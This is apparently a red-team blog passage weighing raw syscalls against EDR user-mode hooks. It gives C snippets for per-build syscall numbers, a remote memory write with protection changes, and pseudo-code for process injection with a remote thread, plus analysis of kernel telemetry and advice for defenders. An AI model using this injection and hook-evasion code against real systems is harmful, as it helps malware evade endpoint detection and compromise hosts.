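// Illustrative only: map OS builds to the syscall number for one function.
// The numbers here are placeholders and would be generated at build time
// from a trusted table.
typedef struct { DWORD Build; DWORD Ssn; } SSN_ENTRY;

static const SSN_ENTRY NtReadVirtualMemorySsn[] = {
    { 17763, 0x3F },   // placeholder values
    { 18362, 0x3F },
    { 19041, 0x3F },
};

typedef NTSTATUS (NTAPI *RtlGetVersion_t)(PRTL_OSVERSIONINFOW);

static DWORD SsnForCurrentBuild(const SSN_ENTRY *table, SIZE_T count)
{
    RTL_OSVERSIONINFOW vi = { 0 };
    vi.dwOSVersionInfoSize = sizeof(vi);

    RtlGetVersion_t RtlGetVersion = (RtlGetVersion_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlGetVersion");
    if (!RtlGetVersion || RtlGetVersion(&vi) != 0)
        return (DWORD)-1;

    for (SIZE_T i = 0; i < count; i++)
        if (table[i].Build == vi.dwBuildNumber)
            return table[i].Ssn;

    return (DWORD)-1;   // unknown build: fall back to ntdll or bail out
}

The number returned would then be handed to whatever external assembler stub actually issues the syscall instruction.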
syscalls miss useful/critical functionality
In addition to ease of use from C/C++, user mode APIs provide additional functionality before control ever reaches the kernel. This could be setting up or formatting arguments, exception and edge-case handling, SxS/activation contexts, and so on. By syscalling yourself instead of using these APIs, you miss out on all of that, for better or for worse. In some cases that means porting the behavior directly into your assembler stub or setting up the environment before and after execution.
In some cases, like WriteProcessMemory or CreateRemoteThreadEx, the extra work is more “helpful” than strictly necessary. In others, like CreateEnclave or CallEnclave, it’s virtually a requirement. If you’re angling to use only a specific set of functions (NtReadVirtualMemory/NtWriteVirtualMemory/etc.) this might not be much of an issue, but expanding beyond that comes with significant caveats.
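To make that concrete for the WriteProcessMemory case: the Win32 call (roughly) takes care of making the target region writable and restoring the original protection around the write. Call NtWriteVirtualMemory yourself and that housekeeping becomes your problem. A minimal sketch, using the commonly published Nt* signatures resolved from ntdll (still not raw syscalls; the point is only the extra steps):

#include <windows.h>
#include <winternl.h>

// Commonly published (unofficial) prototypes.
typedef NTSTATUS (NTAPI *NtProtectVirtualMemory_t)(HANDLE, PVOID *, PSIZE_T, ULONG, PULONG);
typedef NTSTATUS (NTAPI *NtWriteVirtualMemory_t)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);

// Roughly what WriteProcessMemory would otherwise do for us: make the target
// region writable, write, then restore the old protection.
static NTSTATUS WriteRemote(HANDLE hProc, PVOID dst, PVOID src, SIZE_T len)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    NtProtectVirtualMemory_t NtProtectVirtualMemory =
        (NtProtectVirtualMemory_t)GetProcAddress(ntdll, "NtProtectVirtualMemory");
    NtWriteVirtualMemory_t NtWriteVirtualMemory =
        (NtWriteVirtualMemory_t)GetProcAddress(ntdll, "NtWriteVirtualMemory");

    PVOID  base    = dst;
    SIZE_T size    = len;
    ULONG  oldProt = 0;
    SIZE_T written = 0;

    NTSTATUS status = NtProtectVirtualMemory(hProc, &base, &size,
                                             PAGE_READWRITE, &oldProt);
    if (status != 0) return status;

    status = NtWriteVirtualMemory(hProc, dst, src, len, &written);

    // Restore the original protection regardless of the write outcome.
    NtProtectVirtualMemory(hProc, &base, &size, oldProt, &oldProt);
    return status;
}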
the spooky functions are probably being called anyway
In general, syscalling is used to evade some function known or suspected to be hooked in user mode. In certain scenarios we can guarantee that the raw syscall is the only way that hooked function will ever execute. In others, however, such as a more feature-rich stage 0 or C2, we can’t guarantee this. Consider the following (pseudo-code):
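Something along these lines, where the sc_* calls are hypothetical wrappers around hand-rolled syscall stubs rather than ntdll imports, and objAttr, clientId, and payload are assumed to be set up earlier:

// Pseudo-code: classic injection, issued entirely through raw syscall stubs.
sc_NtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &clientId);
sc_NtAllocateVirtualMemory(hProcess, &remote, 0, &size,
                           MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
sc_NtWriteVirtualMemory(hProcess, remote, payload, payloadLen, NULL);
sc_NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess,
                    remote, NULL, 0, 0, 0, 0, NULL);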
In the above we’ve opened a writable process handle, allocated a blob of memory, written into it, and started a thread to execute it: a very common process injection strategy. Setting aside the tsunami of information this feeds into the kernel, only dynamic instrumentation of the runtime would detect something like this; any IAT or inline hooks are evaded.
But say your loader does a few other things and makes a few other calls into user32, dnsapi, kernel32, etc. Do you know that those functions don’t call into the very functions you’re attempting to avoid? Now you could argue that by evading the hooks on the more sensitive functionality (the process injection), you’ve lowered your threat score with the EDR. That isn’t entirely true, though, because the EDR isn’t blind to your remote thread (PsSetCreateThreadNotifyRoutine), your writable process handle (ObRegisterCallbacks), or even your cross-process memory write. What you’ve really done is avoid handing the EDR contextualized user mode telemetry about the injection; is that enough to avoid heightened scrutiny? Maybe.
Additionally, modern EDRs hook a ton of stuff (or at least some do). Most syscall projects and research focus on NTDLL; what about kernel32, user32, advapi32, wininet, and friends? Syscall evasion does nothing for those because, naturally, a majority of those functions never need to syscall into the kernel (or do so via other ntdll functions…). For real evasion coverage, then, you may need to bolt on both raw syscall support and a generic unhooking strategy for the other modules.
syscalls are partially effective at escaping UM data sinks
Many user mode hooks themselves do not have proactive defense capabilities baked in. By and large they are used to gather telemetry on the call context to provide to the kernel driver or system service for additional analysis. This analysis, paired with what it’s gathered via ETW, kernel mode hooks, and other data sinks, forms a composite picture of the process since birth.
Let’s take the example of cross-process code injection referenced above. Let’s also give your loader the benefit of the doubt and assume it’s tripped nothing and emitted little telemetry on its way to execution. When the following is run:
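(The same hypothetical sequence from earlier, again issued through raw syscall stubs rather than any hooked user mode API:)

// No user mode hook is touched, but every step below still lights up the kernel.
sc_NtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &clientId);
sc_NtAllocateVirtualMemory(hProcess, &remote, 0, &size,
                           MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
sc_NtWriteVirtualMemory(hProcess, remote, payload, payloadLen, NULL);
sc_NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess,
                    remote, NULL, 0, 0, 0, 0, NULL);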
We are firing off a ton of telemetry to the kernel and any listening drivers. Without a single user mode hook, the EDR would still know:
Process A opened a handle to Process B with X permissions (ObRegisterCallbacks)
Process A allocated memory in Process B with X permissions (EtwTi)
Process A wrote data into Process B VAS (EtwTi)
Process A created a remote thread in Process B (PsSetCreateThreadNotifyRoutine, ETW)
It is true that EtwTi is newish and doesn’t capture everything, hence the partial effectiveness. But that argument grows thinner over time as adoption of the feed grows and the API matures.
A stronger argument for syscalls here is that they evade custom data sinks. Up until now we’ve only considered what Microsoft provides, not what a vendor might include in its hook routine and how that telemetry might influence the agent’s model. Some vendors, for performance reasons, prefer to extract thread information at call time. Some capture all parameters and pack them into more consumable binary blobs for consumption in the kernel. Depending on what exactly the hook does, and how critical it is to the Bayesian model, this might be a great reason to use raw syscalls.
your testing isn’t comprehensive or indicative of the general case
This is a more general gripe with some of the conversation around modern EDR evasion. Modern EDRs use a variety of learning heuristics to determine whether an unknown binary is malicious; sometimes successfully, sometimes not. The model is initially trained on some data set (depending on the vendor), but continues to grow based on its observations of the environment and data shared amongst nodes; this is generally known as online learning. On large deployments of new EDRs there is typically a learning or passive phase, which allows the model to collect baseline metrics of what is normal and, hopefully, identify anomalies and deviations thereafter.
Effectively then, given a long enough timeline, one enterprise’s agent model might be significantly different from another’s. This has a few implications. The first, of course, is that your lab environment is not an accurate representation of the client. And while your syscall stub might work fine in the lab, unless it’s particularly novel, it’s entirely possible it’s been observed elsewhere.
This also means that pinpointing why your payload does or doesn’t work is a bit of a dark art. If your payload with the syscall evasion ends up working in a client environment, does that mean the evasion was successful, or would it have worked regardless of whether you used ntdll? If, on the other hand, your payload was blocked, can you identify the syscalls as the problem? And if you add the evasion stubs and successfully execute, can you definitively point to the syscall evasion as what kept the threat score down?
At this point, then, it’s a game of risk. You risk allowing the agent’s model to continue aggregating telemetry and improving its heuristics, and thereby the entire network’s model. Repeated testing taints the analysis chain as the model learns to identify portions of your code as malicious or not: a fuzzy match, regardless of the function or assembler changes you make. You also risk exposing that telemetry and those details to the cloud, where they land in the hands of both automated and manual tooling and analysis. And if you disable that piece, you no longer have an accurate representation of the product’s detection capabilities.
In short, much of the testing we do against these new EDR solutions is rather unscientific. That’s largely a result of our inability to peer into the state of an agent’s model while also deterministically assessing its capabilities. Testing in a limped state (i.e. offline, with cloud connectivity blackholed, etc.) and restarting VMs after every test provides some basic insight, but we lose a significant chunk of EDR capability along the way. Isolation is difficult.
anyway
These things, taken together, motivate my reluctance to embrace the strategy in much of my tooling. I’ve found scant cases in which a raw syscall was preferable to some other technique, and I’ve grown tired of the confidence behind some tooling claims. The EDRs of today are not the EDRs of our red teaming forefathers; testing is complicated, telemetry insight is improving, and data sets and enterprise security budgets are growing. We’ve got to get better at quantifying and substantiating our tool testing and analysis, and we need to improve the conversation surrounding these technologies.
I have a few brief, unsolicited thoughts for both red teams and EDR vendors based on my years of experience in this space. I’d love to hear others.
for EDR
Do not rely on user mode hooks and, more importantly, do not implicitly trust them. Seriously. Even if you’re monitoring hook integrity from the kernel, there are too many variables and too many opportunities for malicious code to tamper with or otherwise corrupt the hook or the integrity of the incoming data. Consider it from a performance perspective if you need to. I know you think you’re being cute by:
Monitoring your hot patches for modification
Encrypting telemetry
Transmitting telemetry via clandestine/obscure methods (I see you NtQuerySystemInformation)
“Validating” client processes
The fact is, anything emitted from an unsigned, untrusted user mode process can be corrupted. Put your efforts into consuming ETW and registering callbacks on all the important routines, PPL’ing your user mode services, and locking down your IPC and general communication channels. Consume AMSI if you must, with the same caveat as user mode hooks: it is a data sink, and not necessarily one of truth.
The more you can consume in the kernel (maybe a trustlet some day?), the more difficult you are to tamper with. A red team can of course wormhole into the kernel and attack your driver, but that is another hurdle for an attacker to leap, and yet another opportunity to catch them.
for red team
Using raw syscalls is but a small component of a greater system — evasion is less a set of techniques and more a system of behaviors. Consider that the hooks themselves are not the problem, but rather what the hooks do. I had to edit myself several times here to not reference the spoon quote from the Matrix, but it’s apt, if cliche.
There are also more effective methods of evading user mode hooks than raw syscalling. I’ve discussed some of them publicly in the past, but I urge you to investigate the inner workings of the EDR hooks themselves. I’d argue even IAT/inline unhooking is more effective in some cases.
Cloud capabilities are the truly scary expansion. Sample submission, cloud telemetry aggregation and analysis, and manual/automatic hunting services change the landscape of threat analysis. Not only can your telemetry be correlated and bolstered amongst nodes, it can be retroactively hunted and analyzed. This retroactive capability, often provided by backend automation or threat hunting teams (hi Overwatch!), can be quite effective at improving an enterprise’s agent models. And not only one enterprise’s model; these data points are shared amongst all of the vendor’s subscribers and used to improve those agent models as well. Burning a technique is no longer isolated to a single technology or client.